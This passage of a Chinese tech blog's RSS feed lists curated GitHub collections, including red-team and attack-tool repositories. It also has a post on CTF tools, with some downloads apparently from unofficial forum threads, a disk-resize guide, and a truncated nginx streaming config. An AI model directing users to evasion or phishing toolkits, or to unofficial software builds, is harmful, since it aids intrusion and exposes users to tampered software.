    &lt;a href=&quot;?id=%e5%90%88%e9%9b%86%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;合集项目&quot;&gt;合集项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;span style=&quot;text-decoration:line-through;&quot;&gt;&lt;a href=&quot;https://github.com/GrowingGit/GitHub-Chinese-Top-Charts&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;GitHub-Chinese-Top-Charts&lt;/a&gt; - 优秀&lt;strong&gt;中文项目集合&lt;/strong&gt;，可以无语言障碍地、更高效地吸收优秀经验成果。&lt;/span&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Wechat-ggGitHub/Awesome-GitHub-Repo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Awesome-GitHub-Repo&lt;/a&gt; - 收集整理 &lt;code&gt;GitHub&lt;/code&gt; 上高质量、有趣的&lt;strong&gt;开源项目&lt;/strong&gt;，并将他们进行归类。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/eryajf/Thanks-Mirror&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Thanks-Mirror&lt;/a&gt; - 整理记录各个&lt;strong&gt;包管理器&lt;/strong&gt;，&lt;strong&gt;系统镜像&lt;/strong&gt;，以及常用软件的好用镜像。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/chinese-poetry/chinese-poetry&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;chinese-poetry&lt;/a&gt; - 最全&lt;strong&gt;中华古诗词数据库&lt;/strong&gt;，唐宋两朝近一万四千古诗人，接近5.5万首唐诗加26万宋诗，两宋时期1564位词人，21050首词。&lt;a href=&quot;https://awesome-poetry.top/huajianji/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/docsifyjs/awesome-docsify&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-docsify&lt;/a&gt; - 基于 &lt;code&gt;docsify&lt;/code&gt; 实现的网站集合。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/myles/awesome-static-generators&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-static-generators&lt;/a&gt; - 静态网站生成工具集合。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/HCLonely/awesome-bilibili-extra&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-bilibili-extra&lt;/a&gt; - B站的浏览器扩展/脚本/程序。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/521xueweihan/HelloGitHub&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;HelloGitHub&lt;/a&gt; - 分享 &lt;code&gt;GitHub&lt;/code&gt; 上有趣、入门级的开源项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/forthespada/CS-Books&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;CS-Books&lt;/a&gt; - 超过1000本的计算机经典书籍。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/gonglei007/GameDevMind&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;GameDevMind&lt;/a&gt; - 最全面的游戏开发技术图谱。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/GitHubDaily/GitHubDaily&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;GitHubDaily&lt;/a&gt; - 坚持分享 &lt;code&gt;GitHub&lt;/code&gt; 上高质量、有趣实用的开源技术教程、开发者工具、编程网站、技术资讯。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/doocs/leetcode&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;leetcode&lt;/a&gt; - 多种编程语言实现 &lt;code&gt;LeetCode&lt;/code&gt;.&lt;a href=&quot;https://doocs.github.io/leetcode/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Threekiii/Awesome-Redteam&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Awesome-Redteam&lt;/a&gt; - 攻防知识仓库。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/sun0225SUN/Awesome-Love-Code&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Awesome-Love-Code&lt;/a&gt; - 表白代码收藏馆。&lt;a href=&quot;https://gh.sunguoqi.com/Awesome-Love-Code/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/vinta/awesome-python&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-python&lt;/a&gt; - 精选的 &lt;code&gt;Python&lt;/code&gt; 框架、项目。&lt;a href=&quot;https://awesome-python.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/liuchong/awesome-roadmaps&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-roadmaps&lt;/a&gt; - 各种编程语言、框架和工具的路线图集合。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/public-apis/public-apis&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;public-apis&lt;/a&gt; - 免费的 &lt;code&gt;API&lt;/code&gt; 接口集合。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bleedline/Awesome-gptlike-shellsite&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Awesome-gptlike-shellsite&lt;/a&gt; - &lt;code&gt;ChatGPT&lt;/code&gt; 集合项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bianchenglequ/NetCodeTop&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;NetCodeTop&lt;/a&gt; - 收集 &lt;code&gt;GitHub&lt;/code&gt; 上有关. &lt;code&gt;Net&lt;/code&gt;、&lt;code&gt;.NetCore&lt;/code&gt; 有趣、有用、热门的开源项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/byoungd/English-level-up-tips&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;English-level-up-tips&lt;/a&gt; - 离谱的英语学习指南/英语学习教程。&lt;a href=&quot;https://byoungd.github.io/English-level-up-tips/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/fangzesheng/free-api&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;free-api&lt;/a&gt; - 免费的接口服务集合。&lt;a href=&quot;https://www.free-api.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/TonnyL/Awesome_APIs&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Awesome_APIs&lt;/a&gt; - &lt;code&gt;Api&lt;/code&gt; 接口集合。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/jobbole/awesome-java-cn&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-java-cn&lt;/a&gt; - &lt;code&gt;Java&lt;/code&gt; 资源大全中文版，包括开发库、开发工具、网站、博客、微信、微博等。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/guchangan1/All-Defense-Tool&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;All-Defense-Tool&lt;/a&gt; - 集成了全网优秀的攻防武器工具项目，包含自动化利用，子域名、目录扫描、端口扫描等信息收集工具，各大中间件、cms漏洞利用工具，爆破工具、内网横向及免杀、社工钓鱼以及应急响应等资料。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/helloqingfeng/Awsome-Front-End-learning-resource&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Awsome-Front-End-learning-resource&lt;/a&gt; - &lt;code&gt;GitHub&lt;/code&gt; 最全的前端资源汇总仓库（包括前端学习、开发资源、求职面试等）。&lt;a href=&quot;https://helloqingfeng.github.io/front-end-index/index.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zhaoolee/ChineseBQB&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ChineseBQB&lt;/a&gt; - 中国表情包大集合。&lt;a href=&quot;https://v2fy.com/asset/0i/ChineseBQB/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/justjavac/awesome-wechat-weapp&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-wechat-weapp&lt;/a&gt; - 微信小程序开发资源汇总。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zhaoolee/ins&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ins&lt;/a&gt; - 开源&lt;strong&gt;灵感&lt;/strong&gt;数据库，免费无广告。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/opendigg/awesome-github-vue&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-github-vue&lt;/a&gt; - &lt;code&gt;Vue&lt;/code&gt; 相关开源项目库汇总。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/LiLittleCat/awesome-free-chatgpt&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-free-chatgpt&lt;/a&gt; - 免费的 &lt;code&gt;ChatGPT&lt;/code&gt; 镜像网站列表。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hoochanlon/hamulete&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;hamulete&lt;/a&gt; - 国立台湾大学、新加坡国立大学、早稻田大学、东京大学，中央研究院（台湾）以及中国重点高校及科研机构，社科、经济、数学、博弈论、哲学、系统工程类学术论文等知识库。&lt;a href=&quot;https://hoochanlon.github.io/hamulete/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/521xueweihan/OneFile&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;OneFile&lt;/a&gt; - 汇集了一个文件、运行简单、一看就懂的开源项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/opendigg/awesome-github-wechat-weapp&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-github-wechat-weapp&lt;/a&gt; - 微信小程序开源项目库汇总。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/biggerduck/RedTeamNotes&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;RedTeamNotes&lt;/a&gt; - 红队笔记。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/weiyinfu/MaoZeDongAnthology&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MaoZeDongAnthology&lt;/a&gt; - 毛泽东选集。&lt;a href=&quot;https://weiyinfu.cn/MaoZeDongAnthology/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/it-ebooks-0/geektime-books&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;geektime-books&lt;/a&gt; - 极客时间电子书。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xiaolai/everyone-can-use-english&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;everyone-can-use-english&lt;/a&gt; - 人人都能用英语。&lt;a href=&quot;https://1000h.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/awesome-selfhosted/awesome-selfhosted&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-selfhosted&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/awesome-selfhosted/awesome-selfhosted?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/awesome-selfhosted/awesome-selfhosted?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/awesome-selfhosted/awesome-selfhosted?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/awesome-selfhosted/awesome-selfhosted?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/awesome-selfhosted/awesome-selfhosted&quot; data-origin=&quot;https://img.shields.io/github/license/awesome-selfhosted/awesome-selfhosted&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/awesome-selfhosted/awesome-selfhosted&quot; data-origin=&quot;https://img.shields.io/github/last-commit/awesome-selfhosted/awesome-selfhosted&quot; alt=&quot;&quot;/&gt; &amp;nbsp;- 自托管软件应用合集。&lt;a href=&quot;https://awesome-selfhosted.net/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/justjavac/free-programming-books-zh_CN&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;free-programming-books-zh_CN&lt;/a&gt; - 免费的计算机编程类中文书籍。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/eryajf/awesome-ops&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-ops&lt;/a&gt; - 记录每一个与运维相关的优秀项目。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/0voice/expert_readed_books&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;expert_readed_books&lt;/a&gt; - 推荐工程师合适读本，计算机科学、软件技术、创业、思想类、数学类、人物传记书籍等。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/avelino/awesome-go&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-go&lt;/a&gt; - 优秀的 &lt;code&gt;Go&lt;/code&gt; 框架、库和软件的精选合集。&lt;a href=&quot;https://awesome-go.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/YSGStudyHards/Awesome-Tools&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Awesome-Tools&lt;/a&gt; - 程序员常用高效实用工具、软件资源精选，办公效率提升利器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/fffaraz/awesome-cpp&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-cpp&lt;/a&gt; - 优秀的 &lt;code&gt;C++&lt;/code&gt;（或 &lt;code&gt;C&lt;/code&gt;）框架、项目、资源集合。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/deepseek-ai/awesome-deepseek-integration&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-deepseek-integration&lt;/a&gt; - 集成 &lt;code&gt;DeepSeek&lt;/code&gt; 模型的开源项目或者软件合集。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/viatsko/awesome-vscode&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;awesome-vscode&lt;/a&gt; - &lt;code&gt;VS Code&lt;/code&gt; 插件集合项目。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
    &lt;br/&gt;
&lt;/p&gt;</description><pubDate>Mon, 03 Mar 2025 14:35:15 +0800</pubDate></item><item><title>常用的CTF工具合集</title><link>https://blog.ttcx.net/post/%E5%B8%B8%E7%94%A8%E7%9A%84CTF%E5%B7%A5%E5%85%B7%E5%90%88%E9%9B%86.html</link><description>&lt;p&gt;
    &lt;strong&gt;CyberChef&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;介绍&lt;br/&gt;CyberChef是一款开源编码工具，专为数据分析和转换设计。它提供了一个直观的图形界面，用户可以通过拖放操作轻松执行各种编码、解码、加密、解密、数据格式转换等任务。支持多种数据格式和编码方式，如Base64、Hex、JSON、正则表达式等，适用于网络安全分析、取证、开发调试等多种场景。其强大的功能和易用性使其成为网络安全专家和开发者的得力助手。&lt;br/&gt;&lt;br/&gt;下载地址&lt;br/&gt;&lt;a href=&quot;https://github.com/gchq/CyberChef&quot; _src=&quot;https://github.com/gchq/CyberChef&quot; rel=&quot;nofollow&quot;&gt;https://github.com/gchq/CyberChef&lt;/a&gt;&lt;br/&gt;
&lt;/p&gt;
&lt;p&gt;
    &lt;br/&gt;在线地址&lt;br/&gt;&lt;a href=&quot;https://gchq.github.io/CyberChef/&quot; _src=&quot;https://gchq.github.io/CyberChef/&quot; rel=&quot;nofollow&quot;&gt;https://gchq.github.io/CyberChef/&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;ToolsFx&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;介绍&lt;br/&gt;ToolsFx是一款多功能工具集，专为网络安全、开发和日常数据处理设计。它集成了大量实用工具，涵盖编码解码、加密解密、正则表达式、文本处理、网络分析等功能模块。无论是网络安全从业者、开发者还是普通用户，都能从中找到高效解决问题的工具，提升工作效率。&lt;br/&gt;&lt;br/&gt;下载地址&lt;br/&gt;&lt;a href=&quot;https://github.com/Leon406/ToolsFx&quot; _src=&quot;https://github.com/Leon406/ToolsFx&quot; rel=&quot;nofollow&quot;&gt;https://github.com/Leon406/ToolsFx&lt;/a&gt;&lt;br/&gt;
&lt;/p&gt;
&lt;p&gt;
    &lt;br/&gt;&lt;br/&gt;&lt;strong&gt;随波逐流CTF编码工具&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;介绍&lt;br/&gt;随波逐流CTF编码工具是一款专为CTF（Capture The Flag）竞赛设计的实用工具集，专注于编码、解码、加密、解密等任务。它支持多种常见编码格式（如Base64、Hex、URL编码等）和加密算法，帮助参赛者快速解析和处理数据。工具界面简洁，操作直观，适合CTF新手和资深选手使用，是解决密码学、隐写术等题目的得力助手，极大提升解题效率。&lt;br/&gt;&lt;br/&gt;下载地址&lt;br/&gt;&lt;a href=&quot;http://1o1o.xyz/&quot; _src=&quot;http://1o1o.xyz/&quot; rel=&quot;nofollow&quot;&gt;http://1o1o.xyz/&lt;/a&gt;&lt;br/&gt;
&lt;/p&gt;
&lt;p&gt;
    &lt;br/&gt;&lt;strong&gt;Wireshark&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;介绍&lt;br/&gt;Wireshark是一款开源的网络协议分析工具，广泛用于网络故障排查、安全分析和协议开发。它能够实时捕获和分析网络流量，支持上千种协议的解码和过滤。Wireshark提供直观的图形界面和强大的过滤功能，帮助用户深入分析数据包内容，识别潜在的安全威胁或性能问题。&lt;br/&gt;&lt;br/&gt;下载地址&lt;br/&gt;&lt;a href=&quot;https://www.wireshark.org/&quot; _src=&quot;https://www.wireshark.org/&quot; rel=&quot;nofollow&quot;&gt;https://www.wireshark.org/&lt;/a&gt;&lt;br/&gt;
&lt;/p&gt;
&lt;p&gt;
    &lt;br/&gt;&lt;strong&gt;010Editor&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;介绍&lt;br/&gt;010 Editor是一款功能强大的十六进制编辑器和文本编辑器，专为分析和编辑各种二进制文件设计。它支持多种文件格式解析，提供灵活的模板系统，可自定义数据结构解析。适用于逆向工程、数据恢复、文件分析等场景。其直观的界面和高效的工具集，使其成为开发者和安全分析师的必备工具。&lt;br/&gt;&lt;br/&gt;下载地址&lt;br/&gt;&lt;a href=&quot;https://www.52pojie.cn/thread-1863194-1-4.html&quot; _src=&quot;https://www.52pojie.cn/thread-1863194-1-4.html&quot; rel=&quot;nofollow&quot;&gt;https://www.52pojie.cn/thread-1863194-1-4.html&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;BurpSuite&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;介绍&lt;br/&gt;Burp Suite是一款广受欢迎的网络安全测试工具，专为Web应用程序的安全评估而设计。它集成了代理服务器、漏洞扫描器、爬虫、中继器等多种功能模块，支持手动和自动化测试。Burp Suite能够拦截、修改和分析HTTP/S请求，帮助安全人员发现SQL注入、XSS、CSRF等常见漏洞。其强大的扩展性和丰富的插件生态，使其成为渗透测试和漏洞挖掘的首选工具。&lt;br/&gt;&lt;br/&gt;下载地址&lt;br/&gt;&lt;a href=&quot;https://www.52pojie.cn//thread-1544866-1-1.html&quot; _src=&quot;https://www.52pojie.cn//thread-1544866-1-1.html&quot; rel=&quot;nofollow&quot;&gt;https://www.52pojie.cn//thread-1544866-1-1.html&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;ARCHPR&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;介绍&lt;br/&gt;ARCHPR（Advanced Archive Password Recovery）是一款专业的压缩文件密码恢复工具，支持RAR、ZIP、ACE、ARJ等多种压缩格式。它采用多种密码破解技术，包括暴力破解、字典攻击和掩码攻击，能够高效恢复丢失或遗忘的压缩文件密码。ARCHPR界面简洁，操作便捷，适用于个人用户和专业人士，是数据恢复和安全测试中的重要工具。&lt;br/&gt;&lt;br/&gt;下载地址&lt;br/&gt;&lt;a href=&quot;https://www.52pojie.cn/thread-1691394-1-1.html&quot; _src=&quot;https://www.52pojie.cn/thread-1691394-1-1.html&quot; rel=&quot;nofollow&quot;&gt;https://www.52pojie.cn/thread-1691394-1-1.html&lt;/a&gt;&lt;br/&gt;
&lt;/p&gt;
&lt;p&gt;
    &lt;br/&gt;&lt;br/&gt;&lt;strong&gt;轩禹CTF_RSA工具&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;介绍&lt;br/&gt;轩禹ctf_rsa工具是一款用于RSA加密解密的工具，适用于CTF比赛中的密码学题目。&lt;br/&gt;&lt;br/&gt;下载地址&lt;br/&gt;&lt;a href=&quot;https://gitcode.com/open-source-toolkit/848c4&quot; _src=&quot;https://gitcode.com/open-source-toolkit/848c4&quot; rel=&quot;nofollow&quot;&gt;https://gitcode.com/open-source-toolkit/848c4&lt;/a&gt;&lt;br/&gt;
&lt;/p&gt;
&lt;p&gt;
    &lt;br/&gt;
&lt;/p&gt;
&lt;p&gt;
    &lt;strong&gt;zsteg&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;介绍&lt;br/&gt;zsteg是一款用于检测PNG和BMP图像文件中隐藏信息的命令行工具。它能够分析图像文件的LSB（最低有效位）层，发现潜在的隐写数据。该工具广泛应用于CTF比赛和数字取证领域，帮助安全研究人员发现和分析图像中的隐藏信息。&lt;br/&gt;&lt;br/&gt;下载地址&lt;br/&gt;&lt;a href=&quot;https://github.com/zed-0xff/zsteg&quot; _src=&quot;https://github.com/zed-0xff/zsteg&quot; rel=&quot;nofollow&quot;&gt;https://github.com/zed-0xff/zsteg&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
&lt;/p&gt;</description><pubDate>Fri, 28 Feb 2025 11:00:10 +0800</pubDate></item><item><title>阿里云磁盘扩容后宝塔面板信息不同步解决方法</title><link>https://blog.ttcx.net/post/linux-disk-size-resize2fs.html</link><description>&lt;p&gt;1.查看磁盘信息：df -h&lt;/p&gt;&lt;p&gt;&lt;br/&gt;2.然后运行：yum install -y cloud-utils-growpart 安装插件&lt;br/&gt;&lt;br/&gt;3.执行命令：growpart /dev/vda 1 扩展分区，注意查看你要扩展的路径，千万别挂错了！！&lt;br/&gt;&lt;br/&gt;4.扩展完成后，执行命令resize2fs /dev/vda1 对分区大小重写&lt;br/&gt;&lt;br/&gt;例子：&lt;br/&gt;如果df -h里的是 /dev/vda3&lt;br/&gt;执行以下命令&lt;br/&gt;growpart /dev/vda 3&amp;nbsp; #注意这里有个空格&lt;br/&gt;resize2fs /dev/vda3&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;</description><pubDate>Fri, 07 Feb 2025 15:03:29 +0800</pubDate></item><item><title>php对接AI文生文流式输出问题</title><link>https://blog.ttcx.net/post/vue3-php-nginx-ai.html</link><description>&lt;p&gt;&lt;strong&gt;项目背景&lt;/strong&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;vue3调用本地php服务端，php服务端对接ChatGPT，百度千帆大模型，阿里千问Qwen等接口，实现文生文功能。&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;遇到问题&lt;/strong&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;本地开发环境（php+apache）可以流式输出，上传到线上环境（php+nginx）没有流式效果！！&lt;/p&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;解决方案&lt;/strong&gt;&lt;br/&gt;&lt;/p&gt;&lt;p&gt;1、php.ini配置里；&lt;br/&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;output_buffering = off&lt;/span&gt;&lt;/p&gt;&lt;p&gt;2、nginx站点配置；&lt;/p&gt;&lt;pre class=&quot;brush:php;toolbar:false&quot;&gt;&amp;nbsp;&amp;nbsp;location&amp;nbsp;~&amp;nbsp;[^/]\.php(/|$)&amp;nbsp;{
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;fastcgi_pass&amp;nbsp;unix:/dev/shm/php-cgi.sock;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;fastcgi_index&amp;nbsp;index.php;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;include&amp;nbsp;fastcgi.conf;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;proxy_buffering&amp;nbsp;off;&amp;nbsp;#重点
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;fastcgi_keep_conn&amp;nbsp;on;&amp;nbsp;#重点
